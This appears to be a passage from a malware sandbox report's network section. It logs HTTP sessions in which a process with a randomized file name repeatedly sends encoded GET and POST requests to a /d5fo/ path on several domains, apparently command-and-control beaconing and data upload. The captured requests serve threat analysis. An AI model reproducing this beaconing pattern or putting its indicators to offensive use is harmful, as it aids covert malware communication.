Jul 25, 2024 12:08:35.120762110 CEST	1236	IN	Data Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
Jul 25, 2024 12:08:35.120775938 CEST	896	IN	Data Raw: 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62 6c 65 73 20 54 65 6d 70 6c 61 74 65 22 20 63 Data Ascii: ndex.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-con
Jul 25, 2024 12:08:35.120788097 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
Jul 25, 2024 12:08:35.120800018 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
Jul 25, 2024 12:08:35.120811939 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
Jul 25, 2024 12:08:35.121052027 CEST	1236	IN	Data Raw: 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 34 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c Data Ascii: ef="#">Header 4</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header4-transparent.html">Header 4 Transparen
Jul 25, 2024 12:08:35.121064901 CEST	1236	IN	Data Raw: 22 68 65 61 64 65 72 35 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 35 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: "header5-dark.html">Header 5 Dark</a></li> </ul> </li> </ul>
Jul 25, 2024 12:08:35.125482082 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 46 6f 6f 74 65 72 20 32 3c 2f 61 3e 0a Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Footer 2</a> <ul class="dropdown-menu"> <li><a class="drop

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49730	67.223.117.189	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:36.979676962 CEST	479	OUT	GET /d5fo/?7b7D=ZtxaWCYYlalaBLbUZEg6r6j4osC8kpYtaMEhijkB8H2iy1ANSqSP0R6JXlSUbXLuwPWrlga8EoblOOmZuDHqStQkZ0ENq5OQUfKh4Zv5agv6mVk/8VHvrdHyJdoKzVeyYg==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.techstone.top Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:08:37.589132071 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:08:37 GMT Server: Apache Content-Length: 32106 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Jul 25, 2024 12:08:37.589639902 CEST	1236	IN	Data Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
Jul 25, 2024 12:08:37.589658976 CEST	1236	IN	Data Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
Jul 25, 2024 12:08:37.590857983 CEST	1236	IN	Data Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
Jul 25, 2024 12:08:37.590881109 CEST	896	IN	Data Raw: 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62 6c 65 73 20 54 65 6d 70 6c 61 74 65 22 20 63 Data Ascii: ndex.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-con
Jul 25, 2024 12:08:37.592060089 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
Jul 25, 2024 12:08:37.592086077 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
Jul 25, 2024 12:08:37.593184948 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
Jul 25, 2024 12:08:37.593199968 CEST	1236	IN	Data Raw: 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 34 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c Data Ascii: ef="#">Header 4</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header4-transparent.html">Header 4 Transparen
Jul 25, 2024 12:08:37.593210936 CEST	896	IN	Data Raw: 22 68 65 61 64 65 72 35 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 35 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: "header5-dark.html">Header 5 Dark</a></li> </ul> </li> </ul>
Jul 25, 2024 12:08:37.598731995 CEST	1236	IN	Data Raw: 3d 22 46 6f 6f 74 65 72 31 2d 6c 69 67 68 74 2e 68 74 6d 6c 22 3e 46 6f 6f 74 65 72 20 31 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ="Footer1-light.html">Footer 1 Light</a></li> <li><a class="dropdown-item" href="Footer1-dark.html">Footer 1 Dark</a></li> </ul

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49731	23.251.54.212	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:42.730765104 CEST	723	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.anuts.top/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 5a 71 44 75 58 2b 56 43 6d 4f 54 67 73 73 2b 42 70 34 68 57 37 54 37 42 45 46 66 57 56 4d 6e 2f 7a 67 63 61 33 4c 69 53 53 64 72 51 6b 4a 2f 73 4a 56 63 34 32 31 4a 57 49 2b 4f 4f 4f 62 56 6e 41 49 69 52 73 69 4d 6d 35 72 6b 62 6b 37 6e 53 47 45 46 4a 4f 4f 42 47 74 44 51 66 65 36 63 58 33 35 46 49 56 6e 41 4c 39 62 53 4e 70 4e 6a 37 68 7a 69 38 44 2f 37 42 42 6b 74 37 4c 44 50 61 47 4a 33 54 6c 6b 36 34 69 78 78 37 54 67 76 57 50 66 58 37 68 78 75 36 2f 2f 6f 41 5a 65 75 47 6d 33 59 37 6c 53 78 34 63 42 69 5a 41 6e 59 46 77 64 74 32 59 4c 52 77 57 59 7a 74 6a 38 43 4d 66 61 71 5a 6f 77 4d 3d Data Ascii: 7b7D=ZqDuX+VCmOTgss+Bp4hW7T7BEFfWVMn/zgca3LiSSdrQkJ/sJVc421JWI+OOObVnAIiRsiMm5rkbk7nSGEFJOOBGtDQfe6cX35FIVnAL9bSNpNj7hzi8D/7BBkt7LDPaGJ3Tlk64ixx7TgvWPfX7hxu6//oAZeuGm3Y7lSx4cBiZAnYFwdt2YLRwWYztj8CMfaqZowM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49732	23.251.54.212	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:45.261677980 CEST	743	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.anuts.top/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 5a 71 44 75 58 2b 56 43 6d 4f 54 67 71 4d 4f 42 76 66 4e 57 38 7a 36 7a 42 46 66 57 61 73 6e 37 7a 67 41 61 33 4b 32 43 54 76 50 51 6a 6f 50 73 62 45 63 34 78 31 4a 57 41 65 4f 50 52 72 55 4b 41 49 75 5a 73 6a 77 6d 35 74 49 62 6b 2f 6a 53 47 31 46 47 50 65 42 45 6d 6a 51 52 47 61 63 58 33 35 46 49 56 6a 70 6d 39 62 61 4e 70 39 2f 37 67 53 69 2f 4f 66 37 47 47 6b 74 37 50 44 50 57 47 4a 32 38 6c 6c 33 77 69 33 74 37 54 6c 72 57 4f 4d 50 38 34 42 75 34 37 2f 70 58 49 4d 37 66 72 68 73 51 76 69 77 63 44 43 32 33 42 52 31 76 71 2f 6c 65 4c 72 39 49 47 4c 37 61 79 4d 6a 6c 46 35 36 70 32 6e 59 45 65 4c 32 7a 4e 70 52 49 39 67 6c 66 79 6c 78 64 73 6a 44 71 Data Ascii: 7b7D=ZqDuX+VCmOTgqMOBvfNW8z6zBFfWasn7zgAa3K2CTvPQjoPsbEc4x1JWAeOPRrUKAIuZsjwm5tIbk/jSG1FGPeBEmjQRGacX35FIVjpm9baNp9/7gSi/Of7GGkt7PDPWGJ28ll3wi3t7TlrWOMP84Bu47/pXIM7frhsQviwcDC23BR1vq/leLr9IGL7ayMjlF56p2nYEeL2zNpRI9glfylxdsjDq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49733	23.251.54.212	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:47.802118063 CEST	1760	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.anuts.top/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 5a 71 44 75 58 2b 56 43 6d 4f 54 67 71 4d 4f 42 76 66 4e 57 38 7a 36 7a 42 46 66 57 61 73 6e 37 7a 67 41 61 33 4b 32 43 54 76 48 51 6b 61 72 73 4a 33 30 34 77 31 4a 57 4b 2b 4f 4b 52 72 56 49 41 49 32 64 73 6a 38 63 35 75 38 62 32 71 33 53 4e 6e 39 47 45 65 42 45 70 44 51 51 65 36 63 43 33 39 5a 32 56 6e 31 6d 39 62 61 4e 70 2f 4c 37 70 6a 69 2f 4d 66 37 42 42 6b 74 2f 4c 44 50 79 47 4a 76 4c 6c 6c 6a 67 69 45 31 37 51 46 62 57 4a 2f 72 38 77 42 75 2b 33 66 70 66 49 4d 6e 36 72 68 59 32 76 68 73 79 44 43 65 33 41 58 4d 35 31 50 68 52 4b 35 6c 71 4d 36 2b 37 71 38 58 51 48 61 53 4b 32 46 77 59 61 59 47 64 43 64 39 78 34 30 67 4e 70 6a 39 7a 6f 54 71 6b 57 37 63 6f 56 31 43 4d 72 4b 72 43 53 38 30 38 4b 68 6a 47 4f 44 49 4d 4a 66 45 48 4f 30 51 62 35 45 56 78 71 39 68 45 59 63 4a 6f 70 43 4c 62 33 68 44 30 58 4a 30 7a 6e 42 70 61 79 67 2f 38 4a 55 68 33 4d 44 65 59 65 79 44 68 49 65 66 62 44 5a 63 71 65 58 5a 58 74 30 4d 36 6a 34 66 79 46 61 69 6f 62 51 32 46 57 65 5a 59 38 49 6e 64 47 [TRUNCATED] Data Ascii: 7b7D=ZqDuX+VCmOTgqMOBvfNW8z6zBFfWasn7zgAa3K2CTvHQkarsJ304w1JWK+OKRrVIAI2dsj8c5u8b2q3SNn9GEeBEpDQQe6cC39Z2Vn1m9baNp/L7pji/Mf7BBkt/LDPyGJvLlljgiE17QFbWJ/r8wBu+3fpfIMn6rhY2vhsyDCe3AXM51PhRK5lqM6+7q8XQHaSK2FwYaYGdCd9x40gNpj9zoTqkW7coV1CMrKrCS808KhjGODIMJfEHO0Qb5EVxq9hEYcJopCLb3hD0XJ0znBpayg/8JUh3MDeYeyDhIefbDZcqeXZXt0M6j4fyFaiobQ2FWeZY8IndGZiuZcR7+F9tFPXHlj97k8Vy3qCc33Ig9QxSX/ozEJvAQkPH1rnn+zAtEE/+bzNNhplIvr/3MUBMssT3TzwMyMIvDzgk3oErRAGGiAGGwsSz8Xws73v8CDlACvbSAmzOoqj0vvhuCVfQdF5STNDiSo+FJ2K/z/V4MoYx65JKn6E0a6pVYv4JkNxbLOTD3dnR7Ilxf4pRzA/LtW9VJ6B1ge2CfIDoIIRwoJapXeB29TSOJ5U7fIzwj9qR4OFHW7/fa2r7svjcYqb5kJGZV6xWAhXGatqJ+SvNF5LSPUzhBj0ncVl+VhhZ+e4b+Qsw51RKxKUJjDIODrBKX+j4WcsrQ3ClRiwF7owWemvRXnAdVyXupqWs4bIQkeIgJoBrDj5lciv0JiJfThYXVQ6eE3bf5x0xM8G23ekKcWLk471eAoANwr8MftmYIDdcb3ugkLF4sBzBj7J2h9nZF/JraBsdNcvaEwcP1AiqOOTjtbsqg2e2Nqbyt3y4Epim1XyOSLo6JS6b+vEyZSubLCePj9Q8rei6NWLUSdApUiZjDbB7zPAD6gac3Gs2prZ107Fl1ybhx+ntVA1sJVdEt9IUgEUCCaPm7P8+9JrLcMY7zWgAXS5++RX/sjMoDxXGRmV9iw9iia1wGTHF9oFTyBb13PG+nZ5AX+qM+xtPIYD [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49734	23.251.54.212	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:50.324546099 CEST	475	OUT	GET /d5fo/?7b7D=UorOUJsNhtzOpcbW6pRD7y2oLw3yU53b7AktnJqWMfC1hZfMFH0XzXkRJ4yWQIlKeaDAqwcN0the3qftPUt4DeI9smIFWq5tw4RBCGM6pKiUjuqW8ii8RfKWeFMpWQWMaw==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.anuts.top Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49735	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:16.931612968 CEST	741	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.bieniastest.xyz Origin: http://www.bieniastest.xyz Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.bieniastest.xyz/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 47 4f 74 4e 6e 31 2f 6a 39 34 36 47 6d 43 44 52 71 62 6f 67 44 33 59 66 57 62 65 54 39 39 50 39 42 71 77 4a 71 6f 43 56 79 41 4e 68 46 6f 76 2f 52 49 74 53 35 41 51 32 5a 39 73 45 59 4d 6f 36 41 32 50 47 34 42 4c 30 46 74 48 4b 46 52 71 72 38 6a 64 67 69 38 76 77 67 39 58 35 63 41 78 6c 65 37 62 73 70 56 4f 51 4f 68 59 70 46 67 33 37 38 52 30 69 4a 68 65 66 61 4d 76 7a 58 68 61 42 4f 33 54 36 6c 56 38 36 7a 31 4d 56 63 49 58 45 64 51 33 6a 54 78 51 6f 49 2f 33 35 42 49 53 64 77 2f 55 57 75 63 54 45 55 43 4b 66 78 66 34 43 32 45 6c 6b 37 4a 6b 52 4c 38 44 78 2b 45 56 7a 33 59 77 63 79 73 6b 3d Data Ascii: 7b7D=GOtNn1/j946GmCDRqbogD3YfWbeT99P9BqwJqoCVyANhFov/RItS5AQ2Z9sEYMo6A2PG4BL0FtHKFRqr8jdgi8vwg9X5cAxle7bspVOQOhYpFg378R0iJhefaMvzXhaBO3T6lV86z1MVcIXEdQ3jTxQoI/35BISdw/UWucTEUCKfxf4C2Elk7JkRL8Dx+EVz3Ywcysk=
Jul 25, 2024 12:09:17.619477987 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:09:17 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49736	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:19.467070103 CEST	761	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.bieniastest.xyz Origin: http://www.bieniastest.xyz Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.bieniastest.xyz/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 47 4f 74 4e 6e 31 2f 6a 39 34 36 47 6e 69 66 52 6f 37 55 67 4c 33 59 63 61 37 65 54 7a 64 50 35 42 71 73 4a 71 71 75 2f 79 31 64 68 46 4e 44 2f 51 4c 31 53 30 67 51 32 54 64 74 4f 46 63 70 32 41 32 54 2f 34 44 66 30 46 72 72 4b 46 51 61 72 38 55 78 6e 6b 38 76 32 37 4e 58 6e 52 67 78 6c 65 37 62 73 70 56 62 59 4f 68 51 70 46 51 6e 37 75 67 30 6c 44 42 65 59 5a 4d 76 7a 47 78 61 46 4f 33 53 70 6c 57 34 45 7a 7a 49 56 63 4a 6e 45 64 46 44 38 4a 68 52 68 4d 2f 32 75 51 62 2b 5a 78 4f 45 59 6a 64 69 39 54 54 32 79 35 4a 56 6f 73 6d 74 4d 6f 70 49 70 62 76 4c 47 76 30 30 61 74 37 67 73 73 37 79 6c 74 41 57 34 57 69 54 32 6d 64 62 70 59 47 6a 4a 6b 4c 62 6a Data Ascii: 7b7D=GOtNn1/j946GnifRo7UgL3Yca7eTzdP5BqsJqqu/y1dhFND/QL1S0gQ2TdtOFcp2A2T/4Df0FrrKFQar8Uxnk8v27NXnRgxle7bspVbYOhQpFQn7ug0lDBeYZMvzGxaFO3SplW4EzzIVcJnEdFD8JhRhM/2uQb+ZxOEYjdi9TT2y5JVosmtMopIpbvLGv00at7gss7yltAW4WiT2mdbpYGjJkLbj
